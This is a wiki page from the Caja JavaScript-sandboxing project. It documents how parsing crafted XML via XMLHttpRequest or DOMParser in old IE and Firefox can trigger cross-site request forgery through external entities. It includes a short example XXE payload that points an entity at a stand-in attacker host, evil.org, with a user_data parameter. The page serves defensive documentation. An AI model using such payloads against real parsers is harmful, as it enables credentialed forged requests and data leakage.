| Sign in

A source-to-source translator for securing Javascript-based web content

Project Home		Downloads		Wiki		Issues		Source

Search

End-user's Guide

Integration Guide

Developer's Guide

Design Decisions

Releases

CajaVersions

Community

External articles about caja
Containers that use caja
Mailing lists
Ideas and feature requests

RefactoringToolFeatureRequests

Glossary of common terms
All wiki pages

Updated Jun 05, 2008 by mikesamuel
Labels:	Attack-Vector

XsrfViaXxe

parsing XML can cause the browser to fetch arbitrary URLs

XMLHttpRequest and DOMParser parsing allow arbitrary XSRF via XXE

Effect

Can cause the browser to request an arbitrary URL with the user's credentials.

Background

XSRF is described at http://en.wikipedia.org/wiki/Cross-site_request_forgery

See http://www.securiteam.com/securitynews/6D0100A5PU.html for a description of XXE

Most browsers have some form of dom parser similar to http://developer.mozilla.org/en/docs/DOMParser

Assumptions

Untrusted code can access the XMLHttpRequest object or cause a URL that it crafts to be passed to be requested.

Untrusted code can cause a snippet of crafted XML to be parsed.

Versions

IE 6 and old Firefox < 1.5.0.2

From http://lekkimworld.com/2006/05/29/firefox_and_external_xml_entity_references.html covers Firefox's vulnerabilities

Example

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ENTITY external_info SYSTEM "http://evil.org?user_data=123">
]>
<foo>
   &external_info;
</foo>

Similar issues may arise with XSLTransform and the document() function.

Sign in to add a comment